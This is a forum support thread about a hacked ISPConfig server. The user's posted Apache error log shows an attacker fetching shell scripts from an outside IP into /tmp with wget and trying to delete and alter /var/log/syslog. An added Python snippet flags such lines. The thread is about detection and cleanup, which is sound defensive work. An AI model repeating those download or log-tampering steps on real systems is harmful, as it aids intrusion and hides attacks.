No login boxes

Discussion in 'General' started by jopa123, Mar 5, 2014.

  1. jopa123

    jopa123 New Member

    Hey guys,

    I've got ISPConfig 3 running on Ubuntu 9.04. It's been great for quite some time.

    However, for some reason I no longer have boxes available to log into the admin page. The login page comes up with the usual look, just no place to enter admin credentials.

    I'm sure it is something I did but I am stumped.

    Any ideas?

    Thanks in advance for any help.
     
  2. till

    till Super Moderator Staff Member ISPConfig Developer

    Take a look at the Apache error.log. Maybe you changed some php.ini settings that prevent ISPConfig from working.
     
  3. jopa123

    jopa123 New Member

    error.log

    Till,

    Thanks for the response. Following is my Apache2 error.log file. I don't know what I'm looking at but the one thing that sticks out is the repeated connections to 221.132.37.26:80. This is not my IP address. Neither is 54.246.4.70. Does anything else look out of place? If this is something I should not post here, please let me know.


    [Sun Mar 02 06:50:21 2014] [notice] Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g configured -- resuming normal operations
    [Sun Mar 02 06:50:21 2014] [warn] long lost child came home! (pid 14375)
    [Sun Mar 02 06:50:21 2014] [notice] mod_fcgid: call /var/www/linkplazas.info/web/index.php with wrapper /var/www/php-fcgi-scripts/web10/.php-fcgi-starter
    [Sun Mar 02 06:50:43 2014] [notice] mod_fcgid: call /var/www/linkplazas.info/web/index.php with wrapper /var/www/php-fcgi-scripts/web10/.php-fcgi-starter
    [Sun Mar 02 06:55:17 2014] [notice] mod_fcgid: call /var/www/goodcarinsurance.net/web/compare-car-insurance-rate.php with wrapper /var/www/php-fcgi-scripts/web15/.php-fcgi-starter
    [Sun Mar 02 07:10:16 2014] [error] [client 130.185.109.239] File does not exist: /var/www/robots.txt
    [Sun Mar 02 07:26:31 2014] [notice] mod_fcgid: call /var/www/rockwalldata.com/web/index.php with wrapper /var/www/php-fcgi-scripts/web23/.php-fcgi-starter
    [Sun Mar 02 08:18:01 2014] [notice] mod_fcgid: call /var/www/lakesideambucs.org/web/index.php with wrapper /var/www/php-fcgi-scripts/web29/.php-fcgi-starter
    [Sun Mar 02 09:14:34 2014] [error] [client 37.9.53.129] File does not exist: /var/www/administrator
    [Sun Mar 02 09:28:47 2014] [error] [client 66.249.79.82] File does not exist: /var/www/robots.txt
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:45-- http://221.132.37.26/sh
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] connected.
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] HTTP request sent, awaiting response...
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 200 OK
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Length: 1069 (1.0K) [text/plain]
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Saving to: `/tmp/sh'
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 0K . 100% 103M=0s
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 2014-03-02 09:36:45 (103 MB/s) - `/tmp/sh' saved [1069/1069]
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] rm:
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] cannot remove `/var/log/syslog'
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Permission denied
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] touch:
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] cannot touch `/var/log/syslog'
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Permission denied
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] chmod:
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] changing permissions of `/var/log/syslog'
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Operation not permitted
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] chattr: Permission denied
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] while reading flags on /var/log/syslog\r
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:48-- http://221.132.37.26/ru
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] connected.
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] HTTP request sent, awaiting response...
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 200 OK
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] Length: 944 [text/plain]
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] Saving to: `ru'
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 0K 100% 84.9M=0s
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 2014-03-02 09:36:49 (84.9 MB/s) - `ru' saved [944/944]
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:50-- http://221.132.37.26/rr
    [Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
    [Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] connected.
     
  4. jopa123

    jopa123 New Member

    Have I been hacked?

    It looks like illegal calls are being made.
     
  5. jopa123

    jopa123 New Member

    I'm assuming my box is hacked. Do I have any options other than wiping it and starting over?
     
  6. till

    till Super Moderator Staff Member ISPConfig Developer

    According to the log, just a website is hacked. So it might not be necessary to reinstall the whole server. Check the /tmp directory for unusual files and post a:

    ls -la /tmp

    to see which user owns these files. Then you should scan the server with rkhunter and maldetect:

    http://www.howtoforge.com/forums/showpost.php?p=286287&postcount=9
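
In the error.log posted above, wget transcripts and rm/touch/chmod/chattr errors appear under a client IP, which is how stderr from commands started by a web request ends up in Apache's error log. The following is an added example, not part of the original thread, that groups such lines by client; the sample lines are constructed with documentation addresses, and the patterns and the function name `triage` are assumptions.

```python
import re
from collections import defaultdict

# Apache 2.2 error.log layout: [timestamp] [error] [client IP] message
LINE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] ?(?P<msg>.*)$")

# stderr fragments of shell tools; serving a normal page never produces these.
INDICATORS = {
    # wget transcript header: --YYYY-MM-DD HH:MM:SS--  URL
    "download": re.compile(r"^--\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}--\s+(?P<value>\S+)"),
    # where wget wrote the fetched file
    "saved_to": re.compile(r"^Saving to: [`'](?P<value>[^']+)'"),
    # failed attempts to delete or alter files under /var/log
    "log_tamper": re.compile(
        r"(?:cannot remove|cannot touch|changing permissions of|reading flags on) "
        r"[`']?(?P<value>/var/log/[\w./-]+)"
    ),
}

def triage(lines):
    """Group tool-stderr indicators by the client whose request triggered them."""
    hits = defaultdict(lambda: defaultdict(list))
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # notices, warnings and lines without a client field
        for name, rx in INDICATORS.items():
            found = rx.search(m["msg"])
            if found:
                hits[m["ip"]][name].append(found["value"])
    return {ip: dict(kinds) for ip, kinds in hits.items()}

# Constructed sample in the same layout as the posted log (RFC 5737 addresses).
SAMPLE = """\
[Sun Mar 02 09:28:47 2014] [error] [client 198.51.100.7] File does not exist: /var/www/robots.txt
[Sun Mar 02 09:36:45 2014] [error] [client 203.0.113.5] --2014-03-02 09:36:45--  http://192.0.2.10/sh
[Sun Mar 02 09:36:45 2014] [error] [client 203.0.113.5] Connecting to 192.0.2.10:80...
[Sun Mar 02 09:36:45 2014] [error] [client 203.0.113.5] Saving to: `/tmp/sh'
[Sun Mar 02 09:36:48 2014] [error] [client 203.0.113.5] rm:
[Sun Mar 02 09:36:48 2014] [error] [client 203.0.113.5] cannot remove `/var/log/syslog'
[Sun Mar 02 09:36:48 2014] [error] [client 203.0.113.5] : Permission denied
[Sun Mar 02 09:36:48 2014] [error] [client 203.0.113.5] while reading flags on /var/log/syslog\\r
""".splitlines()

if __name__ == "__main__":
    for ip, kinds in triage(SAMPLE).items():
        print(ip, kinds)
```

The timestamps of the flagged lines can then be matched against each site's access log to find which script received the request.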
     
  7. jopa123

    jopa123 New Member

    Thanks, Till,

    Here is the ls -la /tmp

    total 80
    drwxrwxrwx 4 root root 65536 2014-03-17 21:35 .
    drwxr-xr-x 22 root root 4096 2014-03-17 18:39 ..
    drwxrwxrwt 2 root root 4096 2014-03-17 18:39 .ICE-unix
    drwxrwxrwt 2 root root 4096 2014-03-17 18:39 .X11-unix

    I ran maldetect and it found and quarantined 5 items. This may have fixed my issues but I don't know since I still do not have login boxes for the ISPConfig admin page. So I can't log in.

    I installed RKHunter but it would not run. User error I'm sure. I get the following error.

    'Invalid SCRIPTWHITELIST configuration option: Non-existent pathname: /usr/sbin/prelink'

    Very grateful for any and all help.
     
  8. jopa123

    jopa123 New Member

    DNS issues?

    In the interest of full disclosure, here are some more symptoms that could be entirely unrelated.

    1) I recently was forced to switch ISPs. I am now on AT&T.
    2) When the server is plugged in I seem to have basic surfing issues with other computers in my network.
    3) The issues seem to be DNS related. Websites become slow to respond and there seems to be trouble "resolving host"

    Could the server be overriding DNS calls or something? I feel I could investigate more if I could just log in to ISPConfig.

    Thanks again.
     
  9. jopa123

    jopa123 New Member

    Any suggestions on how I can get my login boxes back on the admin login page?
     
  10. till

    till Super Moderator Staff Member ISPConfig Developer

    Which error do you get in the Apache error.log when you open the ISPConfig control panel page?
     
